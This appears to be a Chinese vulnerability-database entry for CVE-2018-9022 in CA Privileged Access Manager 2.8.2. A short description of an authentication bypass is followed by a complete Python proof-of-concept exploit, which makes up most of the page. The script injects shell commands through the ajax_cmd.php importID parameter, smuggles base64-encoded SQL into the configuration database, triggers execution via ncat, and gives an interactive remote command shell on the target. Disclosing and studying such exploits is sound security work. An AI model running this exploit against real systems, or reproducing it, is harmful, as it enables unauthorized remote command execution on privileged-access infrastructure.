CA Privileged Access Manager 安全漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1209381 漏洞类型 权限许可和访问控制问题
发布时间 2019-12-06 更新时间 2019-12-06
CVE编号 CVE-2018-9022 CNNVD-ID CNNVD-201806-903
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019120022
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201806-903
|漏洞详情
CA Privileged Access Manager是美国CA公司的一款特权访问管理器,它能够在多个物理和虚拟环境中集中管理特权用户策略,并管理和控制对IT资源的访问。 CA Privileged Access Manager 2.8.2及之前版本中存在身份验证绕过漏洞。远程攻击者可利用该漏洞执行任意代码或命令。
|漏洞EXP
# Title: Broadcom CA Privilged Access Manager 2.8.2 - Remote Command Execution
# Author: Peter Lapp
# Date: 2019-12-05
# Vendor: https://techdocs.broadcom.com/us/product-content/recommended-reading/security-notices/ca20180614-01--security-notice-for-ca-privileged-access-manager.html
# CVE: CVE-2018-9021 and CVE-2018-9022
# Tested on: v2.8.2

import urllib2
import urllib
import ssl
import sys
import json
import base64


ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE


def send_command(ip, cmd):
    cmd = urllib.quote_plus(cmd)
    url = 'https://'+ip+'/ajax_cmd.php?cmd=AD_IMPORT&command=add&groupId=123&importID=|'+cmd+'+2>%261||&deviceMode=test'
    request = urllib2.Request(url, None)
    response = urllib2.urlopen(request, context=ctx)
    result = json.load(response)
    return result['responseData']

def get_db_value():
    cmd = "echo select value from configuration_f where name = 'ssl_vpn_network' | mysql -u root uag"
    db_value = send_command(ip,cmd)
    db_value = db_value.split('\n')[1]
    return db_value
    
def encode_payload(cmd):
    sql_string = "update configuration_f set value='\\';"+cmd+" > /tmp/output;\\'' where name='ssl_vpn_network'"
    cmd = "echo "+base64.b64encode(sql_string)+" | base64 -d | mysql -u root uag "
    return cmd
    
def restore_sql(value):
    sql_string = "update configuration_f set value='"+value+"' where name='ssl_vpn_network'"
    cmd = "echo "+base64.b64encode(sql_string)+" | base64 -d | mysql -u root uag "
    send_command(ip,cmd)
    
def main():
    print '''Xceedium Command Execution PoC by Peter Lapp(lappsec)'''
	
    if len(sys.argv) != 2:
        print "Usage: xceedium_rce.py <target ip>"
        sys.exit()

    global ip
    ip = sys.argv[1]
    print 'Enter commands below. Type exit to quit'
	
    while True:
        cmd = raw_input('# ')
        if cmd == "exit":
            sys.exit()
        orig_value = get_db_value()
        payload = encode_payload(cmd)
        send_command(ip, payload)
        send_command(ip, 'echo -e openvpn\\n | ncat --send-only 127.0.0.1 2210')
        output = send_command(ip, 'cat /tmp/output')
        print output
        restore_sql(orig_value)
	


if __name__ == "__main__":
    main()
|参考资料

来源:support.ca.com

链接:https://support.ca.com/us/product-content/recommended-reading/security-notices/ca20180614-01--security-notice-for-ca-privileged-access-manager.html